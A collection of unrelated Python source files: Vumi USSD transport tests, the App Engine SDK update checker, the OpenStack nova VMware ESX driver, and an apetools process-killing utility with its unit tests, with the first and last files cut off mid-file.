'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_inbound_resume_close(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
yield self.transport.save_session(sid, '2348085832481', '*120*666#')
response_d = self.make_ussd_request(sid, page_id="indexX", data="foo")
msg = yield self.reply_to_message("OK", continue_session=False)
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_RESUME)
self.assertEqual(msg['from_addr'], '2348085832481')
self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'foo')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK</div>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_inbound_cancel(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
yield self.transport.save_session(sid, '2348085832481', '*120*666#')
response = yield self.make_ussd_request(sid, status="1")
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'</page>',
])
self.assertEqual(response, correct_response)
class TestMtechUssdResponse(VumiTestCase):
def setUp(self):
self.mur = MtechUssdResponse("sid123")
def assert_message_xml(self, *lines):
xml_str = ''.join(
["<?xml version='1.0' encoding='UTF-8'?>"] + list(lines))
self.assertEqual(self.mur.to_xml(), xml_str)
def test_empty_response(self):
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'</page>')
def test_free_text(self):
self.mur.add_text("Please enter your name")
self.mur.add_freetext_option()
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'<div>Please enter your name</div>',
'<navigation><link accesskey="*" pageId="indexX" /></navigation>',
'</page>')
def test_menu_options(self):
self.mur.add_text("Please choose:")
self.mur.add_menu_item('chicken', '1')
self.mur.add_menu_item('beef', '2')
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'<div>Please choose:</div>',
'<navigation>',
'<link accesskey="1" pageId="index1">chicken</link>',
'<link accesskey="2" pageId="index2">beef</link>',
'</navigation>',
'</page>')
def test_menu_options_title(self):
self.mur.add_title("LUNCH")
self.mur.add_text("Please choose:")
self.mur.add_menu_item('chicken', '1')
self.mur.add_menu_item('beef', '2')
self.assert_message_xml(
'<page version="2.0">',
'<session_id>sid123</session_id>',
'<title>LUNCH</title>',
'<div>Please choose:</div>',
'<navigation>',
'<link accesskey="1" pageId="index1">chicken</link>',
'<link accesskey="2" pageId="index2">beef</link>',
'</navigation>',
'</page>')
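# A minimal, illustrative sketch (not part of the original test module): how
# the MtechUssdResponse helper exercised above can be driven by hand. Only
# methods already used in these tests (add_title, add_text, add_menu_item,
# to_xml) are assumed; the session id is made up.
if __name__ == '__main__':
    demo = MtechUssdResponse("demo-session-id")
    demo.add_title("LUNCH")
    demo.add_text("Please choose:")
    demo.add_menu_item('chicken', '1')
    demo.add_menu_item('beef', '2')
    # Prints the same kind of <page> document the assertions above expect.
    print(demo.to_xml())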
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Checks for SDK updates."""
import datetime
import logging
import os
import socket
import ssl
import sys
import time
import urllib2
import google
import yaml
from google.appengine.api import validation
from google.appengine.api import yaml_object
VERSION_FILE = '../../VERSION'
UPDATE_CHECK_TIMEOUT = 3
NAG_FILE = '.appcfg_nag'
class NagFile(validation.Validated):
"""A validated YAML class to represent the user's nag preferences.
Attributes:
timestamp: The timestamp of the last nag.
opt_in: True if the user wants to check for updates on dev_appserver
start. False if not. May be None if we have not asked the user yet.
"""
ATTRIBUTES = {
'timestamp': validation.TYPE_FLOAT,
'opt_in': validation.Optional(validation.TYPE_BOOL),
}
@staticmethod
def Load(nag_file):
"""Load a single NagFile object where one and only one is expected.
Args:
nag_file: A file-like object or string containing the yaml data to parse.
Returns:
A NagFile instance.
"""
return yaml_object.BuildSingleObject(NagFile, nag_file)
def GetVersionObject():
"""Gets the version of the SDK by parsing the VERSION file.
Returns:
A Yaml object or None if the VERSION file does not exist.
"""
version_filename = os.path.join(os.path.dirname(google.appengine.__file__),
VERSION_FILE)
try:
version_fh = open(version_filename)
except IOError:
logging.error('Could not find version file at %s', version_filename)
return None
try:
version = yaml.safe_load(version_fh)
finally:
version_fh.close()
return version
def _VersionList(release):
"""Parse a version string into a list of ints.
Args:
release: The 'release' version, e.g. '1.2.4'.
(Due to YAML parsing this may also be an int or float.)
Returns:
A list of ints corresponding to the parts of the version string
between periods. Example:
'1.2.4' -> [1, 2, 4]
'1.2.3.4' -> [1, 2, 3, 4]
Raises:
ValueError if not all the parts are valid integers.
"""
return [int(part) for part in str(release).split('.')]
class SDKUpdateChecker(object):
"""Determines if the local SDK is the latest version.
Nags the user when there are updates to the SDK. As the SDK becomes
more out of date, the language in the nagging gets stronger. We
store a little yaml file in the user's home directory so that we nag
the user only once a week.
The yaml file has the following field:
'timestamp': Last time we nagged the user in seconds since the epoch.
Attributes:
rpcserver: An AbstractRpcServer instance used to check for the latest SDK.
config: The app's AppInfoExternal. Needed to determine which api_version
the app is using.
"""
def __init__(self,
rpcserver,
configs):
"""Create a new SDKUpdateChecker.
Args:
rpcserver: The AbstractRpcServer to use.
configs: A list of yaml objects or a single yaml object that specify the
configuration of this application.
"""
if not isinstance(configs, list):
configs = [configs]
self.rpcserver = rpcserver
self.runtimes = set(config.runtime for config in configs)
self.runtime_to_api_version = {}
for config in configs:
self.runtime_to_api_version.setdefault(
config.runtime, set()).add(config.api_version)
@staticmethod
def MakeNagFilename():
"""Returns the filename for the nag file for this user."""
user_homedir = os.path.expanduser('~/')
if not os.path.isdir(user_homedir):
drive, unused_tail = os.path.splitdrive(os.__file__)
if drive:
os.environ['HOMEDRIVE'] = drive
return os.path.expanduser('~/' + NAG_FILE)
def _ParseVersionFile(self):
"""Parse the local VERSION file.
Returns:
A Yaml object or None if the file does not exist.
"""
return GetVersionObject()
def CheckSupportedVersion(self):
"""Determines if the app's api_version is supported by the SDK.
Uses the api_version field from the AppInfoExternal to determine if
the SDK supports that api_version.
Raises:
sys.exit if the api_version is not supported.
"""
version = self._ParseVersionFile()
if version is None:
logging.error('Could not determine if the SDK supports the api_version '
'requested in app.yaml.')
return
unsupported_api_versions_found = False
for runtime, api_versions in self.runtime_to_api_version.items():
supported_api_versions = _GetSupportedApiVersions(version, runtime)
unsupported_api_versions = sorted(api_versions -
set(supported_api_versions))
if unsupported_api_versions:
unsupported_api_versions_found = True
if len(unsupported_api_versions) == 1:
logging.critical('The requested api_version (%s) is not supported by '
'the %s runtime in this release of the SDK. The '
'supported api_versions are %s.',
unsupported_api_versions[0], runtime,
supported_api_versions)
else:
logging.critical('The requested api_versions (%s) are not supported '
'by the %s runtime in this release of the SDK. The '
'supported api_versions are %s.',
unsupported_api_versions, runtime,
supported_api_versions)
if unsupported_api_versions_found:
sys.exit(1)
def CheckForUpdates(self):
"""Queries the server for updates and nags the user if appropriate.
Queries the server for the latest SDK version at the same time reporting
the local SDK version. The server will respond with a yaml document
containing the fields:
'release': The name of the release (e.g. 1.2).
'timestamp': The time the release was created (YYYY-MM-DD HH:MM AM/PM TZ).
'api_versions': A list of api_version strings (e.g. ['1', 'beta']).
We will nag the user with increasing severity if:
- There is a new release.
- There is a new release with a new api_version.
- There is a new release that does not support an api_version named in
a configuration in self.configs.
"""
version = self._ParseVersionFile()
if version is None:
logging.info('Skipping update check')
return
logging.info('Checking for updates to the SDK.')
responses = {}
try:
for runtime in self.runtimes:
responses[runtime] = yaml.safe_load(self.rpcserver.Send(
'/api/updatecheck',
timeout=UPDATE_CHECK_TIMEOUT,
release=version['release'],
timestamp=version['timestamp'],
api_versions=version['api_versions'],
runtime=runtime))
except (urllib2.URLError, socket.error, ssl.SSLError), e:
logging.info('Update check failed: %s', e)
return
try:
latest = sorted(responses.values(), reverse=True,
key=lambda release: _VersionList(release['release']))[0]
except ValueError:
      logging.warn('Could not parse the advertised release versions')
      return
if version['release'] == latest['release']:
logging.info('The SDK is up to date.')
return
try:
this_release = _VersionList(version['release'])
except ValueError:
logging.warn('Could not parse this release version (%r)',
version['release'])
else:
try:
advertised_release = _VersionList(latest['release'])
except ValueError:
logging.warn('Could not parse advertised release version (%r)',
latest['release'])
else:
if this_release > advertised_release:
logging.info('This SDK release is newer than the advertised release.')
return
for runtime, response in responses.items():
api_versions = _GetSupportedApiVersions(response, runtime)
obsolete_versions = sorted(
self.runtime_to_api_version[runtime] - set(api_versions))
if len(obsolete_versions) == 1:
self._Nag(
'The api version you are using (%s) is obsolete! You should\n'
'upgrade your SDK and test that your code works with the new\n'
'api version.' % obsolete_versions[0],
response, version, force=True)
elif obsolete_versions:
self._Nag(
'The api versions you are using (%s) are obsolete! You should\n'
'upgrade your SDK and test that your code works with the new\n'
'api version.' % obsolete_versions,
response, version, force=True)
deprecated_versions = sorted(
self.runtime_to_api_version[runtime].intersection(api_versions[:-1]))
if len(deprecated_versions) == 1:
self._Nag(
'The api version you are using (%s) is deprecated. You should\n'
'upgrade your SDK to try the new functionality.' %
deprecated_versions[0], response, version)
elif deprecated_versions:
self._Nag(
'The api versions you are using (%s) are deprecated. You should\n'
'upgrade your SDK to try the new functionality.' %
deprecated_versions, response, version)
self._Nag('There is a new release of the SDK available.',
latest, version)
def _ParseNagFile(self):
"""Parses the nag file.
Returns:
A NagFile if the file was present else None.
"""
nag_filename = SDKUpdateChecker.MakeNagFilename()
try:
fh = open(nag_filename)
except IOError:
return None
try:
nag = NagFile.Load(fh)
finally:
fh.close()
return nag
def _WriteNagFile(self, nag):
"""Writes the NagFile to the user's nag file.
If the destination path does not exist, this method will log an error
and fail silently.
Args:
nag: The NagFile to write.
"""
nagfilename = SDKUpdateChecker.MakeNagFilename()
try:
fh = open(nagfilename, 'w')
try:
fh.write(nag.ToYAML())
finally:
fh.close()
except (OSError, IOError), e:
logging.error('Could not write nag file to %s. Error: %s', nagfilename, e)
def _Nag(self, msg, latest, version, force=False):
"""Prints a nag message and updates the nag file's timestamp.
    Because we don't want to nag the user every time, we store a simple
yaml document in the user's home directory. If the timestamp in this
doc is over a week old, we'll nag the user. And when we nag the user,
we update the timestamp in this doc.
Args:
msg: The formatted message to print to the user.
latest: The yaml document received from the server.
version: The local yaml version document.
force: If True, always nag the user, ignoring the nag file.
"""
nag = self._ParseNagFile()
if nag and not force:
last_nag = datetime.datetime.fromtimestamp(nag.timestamp)
if datetime.datetime.now() - last_nag < datetime.timedelta(weeks=1):
logging.debug('Skipping nag message')
return
if nag is None:
nag = NagFile()
nag.timestamp = time.time()
self._WriteNagFile(nag)
print '****************************************************************'
print msg
print '-----------'
print 'Latest SDK:'
print yaml.dump(latest)
print '-----------'
print 'Your SDK:'
print yaml.dump(version)
print '-----------'
print 'Please visit https://developers.google.com/appengine/downloads'
print 'for the latest SDK'
print '****************************************************************'
def AllowedToCheckForUpdates(self, input_fn=raw_input):
"""Determines if the user wants to check for updates.
On startup, the dev_appserver wants to check for updates to the SDK.
Because this action reports usage to Google when the user is not
otherwise communicating with Google (e.g. pushing a new app version),
the user must opt in.
If the user does not have a nag file, we will query the user and
save the response in the nag file. Subsequent calls to this function
will re-use that response.
Args:
input_fn: used to collect user input. This is for testing only.
Returns:
True if the user wants to check for updates. False otherwise.
"""
nag = self._ParseNagFile()
if nag is None:
nag = NagFile()
nag.timestamp = 0.0
if nag.opt_in is None:
answer = input_fn('Allow dev_appserver to check for updates on startup? '
'(Y/n): ')
answer = answer.strip().lower()
if answer == 'n' or answer == 'no':
print ('dev_appserver will not check for updates on startup. To '
'change this setting, edit %s' %
SDKUpdateChecker.MakeNagFilename())
nag.opt_in = False
else:
print ('dev_appserver will check for updates on startup. To change '
'this setting, edit %s' % SDKUpdateChecker.MakeNagFilename())
nag.opt_in = True
self._WriteNagFile(nag)
return nag.opt_in
def _GetSupportedApiVersions(versions, runtime):
"""Returns the runtime-specific or general list of supported runtimes.
The provided 'versions' dict contains a field called 'api_versions'
which is the list of default versions supported. This dict may also
contain a 'supported_api_versions' dict which lists api_versions by
runtime. This function will prefer to return the runtime-specific
api_versions list, but will default to the general list.
Args:
versions: dict of versions from app.yaml or /api/updatecheck server.
runtime: string of current runtime (e.g. 'go').
Returns:
List of supported api_versions (e.g. ['go1']).
"""
if 'supported_api_versions' in versions:
return versions['supported_api_versions'].get(
runtime, versions)['api_versions']
return versions['api_versions']
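# A minimal, illustrative sketch (not part of the SDK): how the helpers above
# fit together. The 'example_versions' dict is a made-up instance of the yaml
# structure described in the _GetSupportedApiVersions docstring.
if __name__ == '__main__':
  example_versions = {
      'release': '1.9.40',
      'api_versions': ['1'],
      'supported_api_versions': {'go': {'api_versions': ['go1']}},
  }
  # '1.9.40' parses into a sortable list of ints.
  assert _VersionList(example_versions['release']) == [1, 9, 40]
  # Runtime-specific versions win; unknown runtimes fall back to the default.
  assert _GetSupportedApiVersions(example_versions, 'go') == ['go1']
  assert _GetSupportedApiVersions(example_versions, 'python27') == ['1']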
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to the VMware ESX platform.
**Related Flags**
:vmwareapi_host_ip: IPAddress of VMware ESX server.
:vmwareapi_host_username: Username for connection to VMware ESX Server.
:vmwareapi_host_password: Password for connection to VMware ESX Server.
:vmwareapi_task_poll_interval: The interval (seconds) used for polling of
remote tasks
(default: 1.0).
:vmwareapi_api_retry_count: The API retry count in case of failure such as
network failures (socket errors etc.)
(default: 10).
"""
import time
from eventlet import event
from nova import context
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova.openstack.common import cfg
from nova import utils
from nova.virt import driver
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import vim
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vmops
LOG = logging.getLogger(__name__)
vmwareapi_opts = [
cfg.StrOpt('vmwareapi_host_ip',
default=None,
               help='URL for connection to VMWare ESX host. Required if '
'connection_type is vmwareapi.'),
cfg.StrOpt('vmwareapi_host_username',
default=None,
help='Username for connection to VMWare ESX host. '
'Used only if connection_type is vmwareapi.'),
cfg.StrOpt('vmwareapi_host_password',
default=None,
help='Password for connection to VMWare ESX host. '
'Used only if connection_type is vmwareapi.'),
cfg.FloatOpt('vmwareapi_task_poll_interval',
default=5.0,
help='The interval used for polling of remote tasks. '
'Used only if connection_type is vmwareapi'),
cfg.IntOpt('vmwareapi_api_retry_count',
default=10,
help='The number of times we retry on failures, e.g., '
'socket error, etc. '
'Used only if connection_type is vmwareapi'),
cfg.StrOpt('vmwareapi_vlan_interface',
default='vmnic0',
help='Physical ethernet adapter name for vlan networking'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(vmwareapi_opts)
TIME_BETWEEN_API_CALL_RETRIES = 2.0
class Failure(Exception):
"""Base Exception class for handling task failures."""
def __init__(self, details):
self.details = details
def __str__(self):
return str(self.details)
def get_connection(_read_only):
"""Sets up the ESX host connection."""
host_ip = FLAGS.vmwareapi_host_ip
host_username = FLAGS.vmwareapi_host_username
host_password = FLAGS.vmwareapi_host_password
api_retry_count = FLAGS.vmwareapi_api_retry_count
if not host_ip or host_username is None or host_password is None:
        raise Exception(_("Must specify vmwareapi_host_ip, "
                          "vmwareapi_host_username "
                          "and vmwareapi_host_password to use "
                          "connection_type=vmwareapi"))
return VMWareESXConnection(host_ip, host_username, host_password,
api_retry_count)
class VMWareESXConnection(driver.ComputeDriver):
"""The ESX host connection object."""
def __init__(self, host_ip, host_username, host_password,
api_retry_count, scheme="https"):
super(VMWareESXConnection, self).__init__()
session = VMWareAPISession(host_ip, host_username, host_password,
api_retry_count, scheme=scheme)
self._vmops = vmops.VMWareVMOps(session)
def init_host(self, host):
"""Do the initialization that needs to be done."""
# FIXME(sateesh): implement this
pass
def list_instances(self):
"""List VM instances."""
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, network_info,
block_device_mapping=None):
"""Create VM instance."""
self._vmops.spawn(context, instance, image_meta, network_info)
def snapshot(self, context, instance, name):
"""Create snapshot from a running VM instance."""
self._vmops.snapshot(context, instance, name)
def reboot(self, instance, network_info, reboot_type):
"""Reboot VM instance."""
self._vmops.reboot(instance, network_info)
def destroy(self, instance, network_info, block_device_info=None):
"""Destroy VM instance."""
self._vmops.destroy(instance, network_info)
def pause(self, instance):
"""Pause VM instance."""
self._vmops.pause(instance)
def unpause(self, instance):
"""Unpause paused VM instance."""
self._vmops.unpause(instance)
def suspend(self, instance):
"""Suspend the specified instance."""
self._vmops.suspend(instance)
def resume(self, instance):
"""Resume the suspended VM instance."""
self._vmops.resume(instance)
def get_info(self, instance):
"""Return info about the VM instance."""
return self._vmops.get_info(instance)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_info(instance)
def get_console_output(self, instance):
"""Return snapshot of console."""
return self._vmops.get_console_output(instance)
def get_volume_connector(self, _instance):
"""Return volume connector information"""
# TODO(vish): When volume attaching is supported, return the
# proper initiator iqn and host.
return {
'ip': FLAGS.vmwareapi_host_ip,
'initiator': None,
'host': None
}
def attach_volume(self, connection_info, instance_name, mountpoint):
"""Attach volume storage to VM instance."""
pass
def detach_volume(self, connection_info, instance_name, mountpoint):
"""Detach volume storage to VM instance."""
pass
def get_console_pool_info(self, console_type):
"""Get info about the host on which the VM resides."""
return {'address': FLAGS.vmwareapi_host_ip,
'username': FLAGS.vmwareapi_host_username,
'password': FLAGS.vmwareapi_host_password}
def update_available_resource(self, ctxt, host):
"""This method is supported only by libvirt."""
return
def host_power_action(self, host, action):
"""Reboots, shuts down or powers up the host."""
raise NotImplementedError()
def host_maintenance_mode(self, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation."""
raise NotImplementedError()
def set_host_enabled(self, host, enabled):
"""Sets the specified host's ability to accept new instances."""
raise NotImplementedError()
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
self._vmops.plug_vifs(instance, network_info)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
self._vmops.unplug_vifs(instance, network_info)
class VMWareAPISession(object):
"""
Sets up a session with the ESX host and handles all
the calls made to the host.
"""
def __init__(self, host_ip, host_username, host_password,
api_retry_count, scheme="https"):
self._host_ip = host_ip
self._host_username = host_username
self._host_password = host_password
self.api_retry_count = api_retry_count
self._scheme = scheme
self._session_id = None
self.vim = None
self._create_session()
def _get_vim_object(self):
"""Create the VIM Object instance."""
return vim.Vim(protocol=self._scheme, host=self._host_ip)
def _create_session(self):
"""Creates a session with the ESX host."""
while True:
try:
# Login and setup the session with the ESX host for making
# API calls
self.vim = self._get_vim_object()
session = self.vim.Login(
self.vim.get_service_content().sessionManager,
userName=self._host_username,
password=self._host_password)
# Terminate the earlier session, if possible ( For the sake of
# preserving sessions as there is a limit to the number of
# sessions we can have )
if self._session_id:
try:
self.vim.TerminateSession(
self.vim.get_service_content().sessionManager,
sessionId=[self._session_id])
except Exception, excep:
# This exception is something we can live with. It is
# just an extra caution on our side. The session may
# have been cleared. We could have made a call to
# SessionIsActive, but that is an overhead because we
# anyway would have to call TerminateSession.
LOG.debug(excep)
self._session_id = session.key
return
except Exception, excep:
LOG.critical(_("In vmwareapi:_create_session, "
"got this exception: %s") % excep)
raise exception.NovaException(excep)
def __del__(self):
"""Logs-out the session."""
        # Logout to avoid an unnecessary increase in session count at the
# ESX host
try:
self.vim.Logout(self.vim.get_service_content().sessionManager)
except Exception, excep:
# It is just cautionary on our part to do a logout in del just
# to ensure that the session is not left active.
LOG.debug(excep)
def _is_vim_object(self, module):
"""Check if the module is a VIM Object instance."""
return isinstance(module, vim.Vim)
def _call_method(self, module, method, *args, **kwargs):
"""
Calls a method within the module specified with
args provided.
"""
args = list(args)
retry_count = 0
exc = None
last_fault_list = []
while True:
try:
if not self._is_vim_object(module):
# If it is not the first try, then get the latest
# vim object
if retry_count > 0:
args = args[1:]
args = [self.vim] + args
retry_count += 1
temp_module = module
for method_elem in method.split("."):
temp_module = getattr(temp_module, method_elem)
return temp_module(*args, **kwargs)
except error_util.VimFaultException, excep:
# If it is a Session Fault Exception, it may point
# to a session gone bad. So we try re-creating a session
# and then proceeding ahead with the call.
exc = excep
if error_util.FAULT_NOT_AUTHENTICATED in excep.fault_list:
                    # An idle session returns an empty
                    # RetrievePropertiesResponse, but so does a legitimate
                    # query with an empty answer (e.g. no VMs on the host),
                    # so we cannot tell the two apart. If the previous
                    # response was also empty and, after creating a new
                    # session, we still get an empty response, we conclude
                    # that the response really is meant to be empty.
if error_util.FAULT_NOT_AUTHENTICATED in last_fault_list:
return []
last_fault_list = excep.fault_list
self._create_session()
else:
                    # Do not retry: the API call went through and the error
                    # is the caller's fault. The caller should handle such
                    # errors, e.g. an InvalidArgument fault.
break
except error_util.SessionOverLoadException, excep:
# For exceptions which may come because of session overload,
# we retry
exc = excep
except Exception, excep:
                # Any other exception, e.g. improper data furnished in the
                # SOAP call, is not retried; break out and re-raise below.
exc = excep
break
# If retry count has been reached then break and
# raise the exception
if retry_count > self.api_retry_count:
break
time.sleep(TIME_BETWEEN_API_CALL_RETRIES)
LOG.critical(_("In vmwareapi:_call_method, "
"got this exception: %s") % exc)
raise
def _get_vim(self):
"""Gets the VIM object reference."""
if self.vim is None:
self._create_session()
return self.vim
def _wait_for_task(self, instance_uuid, task_ref):
"""
Return a Deferred that will give the result of the given task.
The task is polled until it completes.
"""
done = event.Event()
loop = utils.LoopingCall(self._poll_task, instance_uuid, task_ref,
done)
loop.start(FLAGS.vmwareapi_task_poll_interval)
ret_val = done.wait()
loop.stop()
return ret_val
def _poll_task(self, instance_uuid, task_ref, done):
"""
Poll the given task, and fires the given Deferred if we
get a result.
"""
try:
task_info = self._call_method(vim_util, "get_dynamic_property",
task_ref, "Task", "info")
task_name = task_info.name
if task_info.state in ['queued', 'running']:
return
elif task_info.state == 'success':
LOG.debug(_("Task [%(task_name)s] %(task_ref)s "
"status: success") % locals())
done.send("success")
else:
error_info = str(task_info.error.localizedMessage)
LOG.warn(_("Task [%(task_name)s] %(task_ref)s "
"status: error %(error_info)s") % locals())
done.send_exception(exception.NovaException(error_info))
except Exception, excep:
LOG.warn(_("In vmwareapi:_poll_task, Got this error %s") % excep)
done.send_exception(excep)
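# A minimal, illustrative sketch (not part of nova): the retry pattern that
# VMWareAPISession._call_method implements above, reduced to its essentials.
# call_fn and recreate_session_fn are hypothetical stand-ins for the real VIM
# call and _create_session; the real method also inspects fault types before
# deciding whether to retry.
def _retry_sketch(call_fn, recreate_session_fn, retry_limit=10):
    """Call call_fn, rebuilding the session and retrying on failure."""
    retry_count = 0
    while True:
        try:
            return call_fn()
        except Exception:
            retry_count += 1
            if retry_count > retry_limit:
                raise
            # A failure may mean the session went bad: rebuild it and pause
            # before the next attempt, as _call_method does.
            recreate_session_fn()
            time.sleep(TIME_BETWEEN_API_CALL_RETRIES)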
|
|
#python
import re
# apetools
from apetools.baseclass import BaseClass
from apetools.tools import sleep
from apetools.commons import enumerations, expressions, errors
from apetools.parsers.oatbran import NAMED, STRING_START,SPACES, INTEGER
from apetools.commands.pscommand import PsGrep
from apetools.commands.topcommand import TopGrep
CYGWIN = STRING_START + SPACES + NAMED(n=expressions.PID_NAME,e=INTEGER)
operating_systems = enumerations.OperatingSystem
class KillAllError(errors.CommandError):
"""
A KillAllError is raised if the kill didn't succeed.
"""
class KillAll(BaseClass):
"""
A killall kills processes. The default operating system is linux
"""
def __init__(self, connection=None, name=None, time_to_sleep=0, level=None):
"""
:param:
- `name`: The name of a process to kill
- `time_to_sleep`: The number of seconds to wait for a process to die.
- `connection`: A connection to a device
- `level`: the signal level (as a positive integer)
"""
        super(KillAll, self).__init__()
self._logger = None
self.name = name
self._arguments = None
self.time_to_sleep = time_to_sleep
self._sleep = None
self._connection = None
self.connection = connection
self._grep = None
self._level = None
self.level = level
return
@property
def level(self):
"""
The signal level for ``kill``
"""
if self._level is None:
self._level = ''
return self._level
@level.setter
def level(self, level):
"""
Set the signal level (use None to reset it to the default)
:param:
- `level`: positive integer or None
"""
if level is not None:
self._level = "-{0}".format(level)
else:
self._level = level
return
@property
def connection(self):
"""
A connection to the device
"""
return self._connection
@connection.setter
def connection(self, connection):
"""
Sets the connection, resets the grep (since the OS may have changed)
:param:
- `connection` : a connection to the device (e.g. `SSHConnection`)
:postcondition: self._grep is None, self._connection is `connection`
"""
self._connection = connection
self._grep = None
return
@property
def grep(self):
"""
the parser for the process id's
"""
if self._grep is None:
if self.connection.operating_system == operating_systems.ios:
self._grep = TopGrep(self.connection)
else:
self._grep = PsGrep(self.connection)
return self._grep
@property
def sleep(self):
"""
A sleep object to pace the execution of commands on the device
:return: A sleep timer
"""
if self._sleep is None:
self._sleep = sleep.Sleep(self.time_to_sleep).run
return self._sleep
def kill(self, name, level=None):
"""
Tries to kill all matching processes
:param:
- `name`: the name of the process
- `level`: a signal level to override the set level
"""
if level is None:
level = self.level
kill_count = 0
for pid in self.grep(name):
self.logger.debug("killing: " + pid)
            command = " {0} {1}".format(level, pid)
            kill_count += 1
self.logger.debug("kill " + command)
k_output, k_error = self.connection.kill(command)
for k_line in k_error:
if len(k_line) > 1:
self.logger.error(k_line)
return kill_count
def run(self, name=None, time_to_sleep=None):
"""
Executes the kill
:param:
- `name`: The process to kill
- `time_to_sleep`: Seconds between calls to the device
:raise: KillAllError if the process is still alive at the end
"""
if name is None:
name = self.name
if time_to_sleep is None:
time_to_sleep = self.time_to_sleep
self.logger.debug("process to kill: {0}".format(name))
kill_count = self.kill(name)
if not kill_count:
self.logger.info("No '{p}' processes found on {h}".format(h=self.connection.hostname,
p=name))
return
self.sleep(time_to_sleep)
# double-check to see if the process is dead
        for pid in self.grep(name):
            err = "Unable to kill {0}".format(name)
            self.logger.error(err)
            raise KillAllError(err)
self.logger.info("Killed {k} '{p}' processes on {h}".format(k=kill_count,
h=self.connection.hostname,
p=name))
return
def __call__(self, name=None, time_to_sleep=None):
"""
This is an alias to ``run`` to match the newer-style
:param:
- `name`: The process to kill
- `time_to_sleep`: Seconds between calls to the device
:raise: KillAllError if the process is still alive at the end
"""
self.run(name=name, time_to_sleep=time_to_sleep)
return
def __str__(self):
return "{0} ({2}):{1}".format(self.__class__.__name__, self.name, self.connection)
# end class KillAll
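# A minimal, illustrative sketch (not part of apetools): driving KillAll by
# hand. A real caller would pass a live device connection (e.g. an
# SSHConnection); a MagicMock stands in here, mirroring the tests below, so
# the snippet is self-contained (assuming BaseClass supplies `self.logger`).
if __name__ == '__main__':
    from mock import MagicMock
    fake_connection = MagicMock()
    fake_connection.operating_system = operating_systems.linux
    fake_connection.kill.return_value = ([""], [""])
    fake_connection.hostname = 'test-device'
    killer = KillAll(connection=fake_connection, name='iperf', level=9)
    killer._grep = MagicMock(return_value=[])  # pretend nothing is running
    killer.run()  # logs "No 'iperf' processes found on test-device"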
#python standard library
import unittest
from random import randrange, choice
#third-party
from mock import MagicMock, patch, call
from nose.tools import raises
class TestKillAll(unittest.TestCase):
def setUp(self):
self.connection = MagicMock()
self.kill = KillAll(connection=self.connection)
return
def test_set_connection(self):
"""
Does setting the connection re-set the grep?
"""
self.connection.operating_system = operating_systems.ios
self.assertIsInstance(self.kill.grep, TopGrep)
self.connection.operating_system = operating_systems.android
self.kill.connection = self.connection
self.assertIsInstance(self.kill.grep, PsGrep)
return
def test_kill_command(self):
"""
Will the correct kill command be called?
"""
pgrep = MagicMock()
self.connection.operating_system = operating_systems.linux
self.connection.kill.return_value = [""], [""]
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
expected = [call(" {0}".format(pid)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill.run(name='emacs',
time_to_sleep=0)
self.assertEqual(self.connection.kill.call_args_list, expected)
return
@raises(KillAllError)
def test_failed_kill(self):
"""
Will a failed kill raise an error?
"""
pgrep = MagicMock()
self.connection.operating_system = operating_systems.linux
self.connection.kill.return_value = [""], [""]
pids = ['{0}'.format(randrange(1000)) for i in range(randrange(100))]
pgrep.return_value = pids
self.kill._grep = pgrep
self.kill.run(name='emacs',
time_to_sleep=0)
return
def test_call(self):
"""
        Does `__call__` do the same thing as `run`?
"""
pgrep = MagicMock()
self.connection.operating_system = operating_systems.linux
self.connection.kill.return_value = [""], [""]
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
